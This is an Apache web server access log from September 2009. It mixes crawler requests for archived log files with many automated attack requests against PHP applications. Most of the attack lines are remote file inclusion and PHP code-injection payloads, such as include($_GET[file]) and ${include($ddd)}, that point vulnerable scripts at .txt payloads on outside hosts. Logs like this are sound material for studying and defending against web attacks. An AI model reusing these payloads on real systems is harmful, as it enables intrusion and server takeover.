61.100.5.136 - - [11/Sep/2009:07:38:12 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
61.100.5.136 - - [11/Sep/2009:07:38:12 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.122.72.216 - - [11/Sep/2009:07:40:23 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.scv.co.kr/zboard/skin/4/images/1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
222.122.72.216 - - [11/Sep/2009:07:40:23 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.scv.co.kr/zboard/skin/4/images/1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
222.122.72.216 - - [11/Sep/2009:07:40:23 -0500] "GET /logs/access_log.1236211200//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.scv.co.kr/zboard/skin/4/images/1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.55.106.228 - - [11/Sep/2009:07:40:38 -0500] "GET /logs/access_log.1132185600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.122.72.216 - - [11/Sep/2009:07:40:39 -0500] "GET /logs/access_log.1237075200//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.scv.co.kr/zboard/skin/4/images/1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
222.122.72.216 - - [11/Sep/2009:07:40:49 -0500] "GET /logs/access_log.1236816000//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.scv.co.kr/zboard/skin/4/images/1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
61.100.5.136 - - [11/Sep/2009:07:42:12 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
61.100.5.136 - - [11/Sep/2009:07:42:12 -0500] "GET /logs/access_log.1232409600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.55.106.186 - - [11/Sep/2009:07:43:38 -0500] "GET /logs/access_log.1129075200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.208.125 - - [11/Sep/2009:07:43:52 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.125 - - [11/Sep/2009:07:43:53 -0500] "GET /logs/access_log.1249257600 HTTP/1.1" 200 571441 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
83.103.72.130 - - [11/Sep/2009:07:44:09 -0500] "GET /logs/access_log.1236211200/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://azar.fileave.com/id1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
83.103.72.130 - - [11/Sep/2009:07:44:09 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://azar.fileave.com/id1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
83.103.72.130 - - [11/Sep/2009:07:44:09 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://azar.fileave.com/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
72.34.235.215 - - [11/Sep/2009:07:47:15 -0500] "GET //lib/netcat/require/e404.php?DOCUMENT_ROOT=http://www.solomonedu.net/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
72.34.235.215 - - [11/Sep/2009:07:47:15 -0500] "GET /logs//lib/netcat/require/e404.php?DOCUMENT_ROOT=http://www.solomonedu.net/id1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
72.34.235.215 - - [11/Sep/2009:07:47:15 -0500] "GET /logs/access_log.1246406400//lib/netcat/require/e404.php?DOCUMENT_ROOT=http://www.solomonedu.net/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
72.34.235.215 - - [11/Sep/2009:07:47:27 -0500] "GET /logs/access_log.1239667200//lib/netcat/require/e404.php?DOCUMENT_ROOT=http://www.solomonedu.net/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
61.100.5.136 - - [11/Sep/2009:07:48:35 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
61.100.5.136 - - [11/Sep/2009:07:48:35 -0500] "GET /logs/access_log.1232409600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.55.207.123 - - [11/Sep/2009:07:50:11 -0500] "GET /logs/access_log.1201564800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.140 - - [11/Sep/2009:07:52:16 -0500] "GET /logs/access_log.1250294400 HTTP/1.0" 200 731064 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.110.11.75 - - [11/Sep/2009:07:53:54 -0500] "GET /?skin_board_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
211.110.11.75 - - [11/Sep/2009:07:53:54 -0500] "GET /logs/access_log.1228608000%20%20/?skin_board_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.110.11.75 - - [11/Sep/2009:07:53:56 -0500] "GET /logs/?skin_board_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 200 204578 "-""Mozilla/5.0"
211.110.11.75 - - [11/Sep/2009:07:54:14 -0500] "GET /?skin_board_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
211.110.11.75 - - [11/Sep/2009:07:54:14 -0500] "GET /logs/access_log.1228608000%20%20/?skin_board_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.110.11.75 - - [11/Sep/2009:07:54:18 -0500] "GET /logs/?skin_board_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 200 204578 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:07:54:33 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:07:54:33 -0500] "GET /logs/access_log.1247616000//modules/agendax/addevent.inc.php?agendax_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:07:54:33 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:07:54:35 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:07:54:35 -0500] "GET /logs/access_log.1247616000//modules/agendax/addevent.inc.php?agendax_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:07:54:35 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:07:54:55 -0500] "GET /logs/access_log.1247702400//modules/agendax/addevent.inc.php?agendax_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
83.103.72.130 - - [11/Sep/2009:07:55:11 -0500] "GET /logs/access_log.1244764800/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://azar.fileave.com/id1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:07:55:12 -0500] "GET /logs/access_log.1247702400//modules/agendax/addevent.inc.php?agendax_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:07:58:14 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:07:58:14 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:07:58:14 -0500] "GET /logs/access_log.1232409600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:07:58:14 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:07:58:26 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:07:58:26 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:07:58:26 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:07:58:26 -0500] "GET /logs/access_log.1232409600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.55.207.121 - - [11/Sep/2009:07:59:07 -0500] "GET /logs/access_log.1222732800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.230.165 - - [11/Sep/2009:08:00:19 -0500] "GET /logs/access_log.1155081600 HTTP/1.1" 200 331 "-""Mozilla/4.0"
65.55.230.165 - - [11/Sep/2009:08:00:19 -0500] "GET /logs/access_log.1221523200 HTTP/1.1" 200 35652 "-""Mozilla/4.0"
65.55.230.165 - - [11/Sep/2009:08:00:19 -0500] "GET /logs/access_log.1187222400 HTTP/1.1" 200 1712 "-""Mozilla/4.0"
65.55.230.165 - - [11/Sep/2009:08:00:20 -0500] "GET /logs/access_log.1214697600 HTTP/1.1" 200 3526 "-""Mozilla/4.0"
65.55.230.165 - - [11/Sep/2009:08:00:20 -0500] "GET /logs/access_log.1227052800 HTTP/1.1" 200 51391 "-""Mozilla/4.0"
65.55.230.165 - - [11/Sep/2009:08:00:21 -0500] "GET /logs/access_log.1203206400 HTTP/1.1" 200 1218 "-""Mozilla/4.0"
65.55.230.165 - - [11/Sep/2009:08:00:22 -0500] "GET /logs/access_log.1189123200 HTTP/1.1" 200 1755 "-""Mozilla/4.0"
65.55.230.165 - - [11/Sep/2009:08:00:26 -0500] "GET /logs/access_log.1182643200 HTTP/1.1" 200 329 "-""Mozilla/4.0"
65.55.230.165 - - [11/Sep/2009:08:00:29 -0500] "GET /logs/access_log.1221264000 HTTP/1.1" 200 12873 "-""Mozilla/4.0"
65.55.230.165 - - [11/Sep/2009:08:01:31 -0500] "GET /logs/access_log.1117756800 HTTP/1.1" 200 6330 "-""Mozilla/4.0"
65.55.230.165 - - [11/Sep/2009:08:01:35 -0500] "GET /logs/access_log.1129939200 HTTP/1.1" 200 1463 "-""Mozilla/4.0"
65.55.230.165 - - [11/Sep/2009:08:01:38 -0500] "GET /logs/access_log.1134691200 HTTP/1.1" 200 794 "-""Mozilla/4.0"
65.55.230.165 - - [11/Sep/2009:08:01:40 -0500] "GET /logs/access_log.1204761600 HTTP/1.1" 200 596 "-""Mozilla/4.0"
65.55.230.165 - - [11/Sep/2009:08:01:41 -0500] "GET /logs/access_log.1114732800 HTTP/1.1" 200 332 "-""Mozilla/4.0"
65.55.230.165 - - [11/Sep/2009:08:01:41 -0500] "GET /logs/access_log.1217980800 HTTP/1.1" 200 1342 "-""Mozilla/4.0"
65.55.230.165 - - [11/Sep/2009:08:01:43 -0500] "GET /logs/access_log.1208131200 HTTP/1.1" 200 6397 "-""Mozilla/4.0"
65.55.230.165 - - [11/Sep/2009:08:01:44 -0500] "GET /logs/access_log.1206230400 HTTP/1.1" 200 2381 "-""Mozilla/4.0"
65.55.230.165 - - [11/Sep/2009:08:01:44 -0500] "GET /logs/access_log.1121299200 HTTP/1.1" 200 463 "-""Mozilla/4.0"
65.55.230.165 - - [11/Sep/2009:08:01:46 -0500] "GET /logs/access_log.1106352000 HTTP/1.1" 200 22913 "-""Mozilla/4.0"
65.55.230.165 - - [11/Sep/2009:08:01:47 -0500] "GET /logs/access_log.1133308800 HTTP/1.1" 200 333 "-""Mozilla/4.0"
65.55.230.165 - - [11/Sep/2009:08:01:48 -0500] "GET /logs/access_log.1137456000 HTTP/1.1" 200 1829 "-""Mozilla/4.0"
65.55.230.165 - - [11/Sep/2009:08:01:49 -0500] "GET /logs/access_log.1189296000 HTTP/1.1" 200 2493 "-""Mozilla/4.0"
65.55.207.96 - - [11/Sep/2009:08:02:06 -0500] "GET / HTTP/1.0" 200 3233 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.230.165 - - [11/Sep/2009:08:03:30 -0500] "GET /logs/access_log.1214265600 HTTP/1.1" 200 12926 "-""Mozilla/4.0"
65.55.230.165 - - [11/Sep/2009:08:03:31 -0500] "GET /logs/access_log.1114646400 HTTP/1.1" 200 1186 "-""Mozilla/4.0"
65.55.230.165 - - [11/Sep/2009:08:03:32 -0500] "GET /logs/access_log.1197590400 HTTP/1.1" 200 3175 "-""Mozilla/4.0"
65.55.230.165 - - [11/Sep/2009:08:03:34 -0500] "GET /logs/access_log.1120435200 HTTP/1.1" 200 993 "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:08:04:27 -0500] "GET /?S=A HTTP/1.1" 200 3245 "-""Mozilla/4.0"
82.151.132.176 - - [11/Sep/2009:08:04:39 -0500] "GET /logs/convert/mvcw.php?vwar_root=http://licitalok.com/includes/popups/one.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
82.151.132.176 - - [11/Sep/2009:08:04:39 -0500] "GET /logs/access_log.1229990400/convert/mvcw.php?vwar_root=http://licitalok.com/includes/popups/one.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
82.151.132.176 - - [11/Sep/2009:08:04:40 -0500] "GET /convert/mvcw.php?vwar_root=http://licitalok.com/includes/popups/one.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
82.151.132.176 - - [11/Sep/2009:08:04:40 -0500] "GET /logs/access_log.1246665600/convert/mvcw.php?vwar_root=http://licitalok.com/includes/popups/one.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
65.55.230.165 - - [11/Sep/2009:08:05:57 -0500] "GET /logs/access_log.1240963200 HTTP/1.1" 200 540015 "-""Mozilla/4.0"
65.55.230.165 - - [11/Sep/2009:08:06:34 -0500] "GET /logs/access_log.1240185600 HTTP/1.1" 200 499025 "-""Mozilla/4.0"
220.231.126.252 - - [11/Sep/2009:08:07:37 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.scv.co.kr/zboard/skin/4/images/1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
220.231.126.252 - - [11/Sep/2009:08:07:37 -0500] "GET /logs/access_log.1231977600//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.scv.co.kr/zboard/skin/4/images/1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
220.231.126.252 - - [11/Sep/2009:08:07:37 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.scv.co.kr/zboard/skin/4/images/1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
65.55.106.234 - - [11/Sep/2009:08:08:07 -0500] "GET /logs/access_log.1152403200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
219.85.63.226 - - [11/Sep/2009:08:08:59 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://zclub.nu//nuke/albums/id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
219.85.63.226 - - [11/Sep/2009:08:08:59 -0500] "GET /logs/access_log.1241654400//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://zclub.nu//nuke/albums/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
219.85.63.226 - - [11/Sep/2009:08:08:59 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://zclub.nu//nuke/albums/id1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
219.85.63.226 - - [11/Sep/2009:08:08:59 -0500] "GET /logs/access_log.1243209600//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://zclub.nu//nuke/albums/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
61.100.5.136 - - [11/Sep/2009:08:11:28 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
61.100.5.136 - - [11/Sep/2009:08:11:28 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
61.100.5.136 - - [11/Sep/2009:08:11:28 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
61.100.5.136 - - [11/Sep/2009:08:11:28 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
61.100.5.136 - - [11/Sep/2009:08:11:28 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
61.100.5.136 - - [11/Sep/2009:08:11:28 -0500] "GET /logs/access_log.1232409600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
61.100.5.136 - - [11/Sep/2009:08:11:29 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
61.100.5.136 - - [11/Sep/2009:08:11:29 -0500] "GET /logs/access_log.1232409600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
94.136.37.141 - - [11/Sep/2009:08:13:52 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
94.136.37.141 - - [11/Sep/2009:08:13:52 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
72.34.235.215 - - [11/Sep/2009:08:19:24 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.outfocus.pe.kr/bbs/data/yakusa.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
72.34.235.215 - - [11/Sep/2009:08:19:24 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.outfocus.pe.kr/bbs/data/yakusa.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
72.34.235.215 - - [11/Sep/2009:08:19:24 -0500] "GET /logs/access_log.1240012800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.outfocus.pe.kr/bbs/data/yakusa.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
72.34.235.215 - - [11/Sep/2009:08:19:29 -0500] "GET /logs/access_log.1244505600//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.outfocus.pe.kr/bbs/data/yakusa.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.55.106.185 - - [11/Sep/2009:08:21:07 -0500] "GET /logs/access_log.1188172800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.208.136 - - [11/Sep/2009:08:21:19 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.136 - - [11/Sep/2009:08:21:20 -0500] "GET /logs/access_log.1251849600 HTTP/1.1" 200 701764 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
216.22.26.195 - - [11/Sep/2009:08:21:49 -0500] "GET /logs/!alls%20index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:08:21:49 -0500] "GET /!alls%20index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:08:21:49 -0500] "GET /logs/access_log.1248048000/!alls%20index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:08:21:56 -0500] "GET /logs/access_log.1239321600//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:08:21:56 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:08:21:56 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:08:21:56 -0500] "GET /logs/access_log.1244505600//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
65.55.207.76 - - [11/Sep/2009:08:22:11 -0500] "GET /logs/access_log.1224633600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.22.26.195 - - [11/Sep/2009:08:22:21 -0500] "GET /logs/access_log.1248048000/!alls%20index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:08:22:21 -0500] "GET /logs/!alls%20index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:08:22:21 -0500] "GET /!alls%20index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:08:24:16 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:08:24:16 -0500] "GET /logs/access_log.1239321600//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:08:24:16 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
67.228.191.194 - - [11/Sep/2009:08:24:16 -0500] "GET /logs/access_log.1244505600//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
211.233.69.41 - - [11/Sep/2009:08:24:57 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.233.69.41 - - [11/Sep/2009:08:24:57 -0500] "GET /logs/access_log.1240012800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.233.69.41 - - [11/Sep/2009:08:24:57 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.233.69.41 - - [11/Sep/2009:08:25:02 -0500] "GET /logs/access_log.1244505600//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
83.103.72.130 - - [11/Sep/2009:08:27:20 -0500] "GET /logs/access_log.1239148800/?custompluginfile[]=http://azar.fileave.com/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
83.103.72.130 - - [11/Sep/2009:08:27:20 -0500] "GET /?custompluginfile[]=http://azar.fileave.com/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
83.103.72.130 - - [11/Sep/2009:08:27:22 -0500] "GET /logs/?custompluginfile[]=http://azar.fileave.com/id1.txt? HTTP/1.1" 200 204578 "-""Mozilla/5.0"
72.11.145.8 - - [11/Sep/2009:08:30:05 -0500] "GET /?commonpath=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
72.11.145.8 - - [11/Sep/2009:08:30:37 -0500] "GET /logs/?commonpath=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 200 204578 "-""libwww-perl/5.805"
65.55.230.164 - - [11/Sep/2009:08:30:46 -0500] "GET /logs/access_log.1157846400 HTTP/1.1" 200 657 "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:08:30:47 -0500] "GET /logs/access_log.1202601600 HTTP/1.1" 200 1393 "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:08:30:48 -0500] "GET /logs/access_log.1232409600 HTTP/1.1" 200 200173 "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:08:30:48 -0500] "GET /logs/access_log.1177891200 HTTP/1.1" 200 501 "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:08:30:48 -0500] "GET /logs/access_log.1197676800 HTTP/1.1" 200 4487 "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:08:30:48 -0500] "GET /logs/access_log.1106784000 HTTP/1.1" 200 7834 "-""Mozilla/4.0"
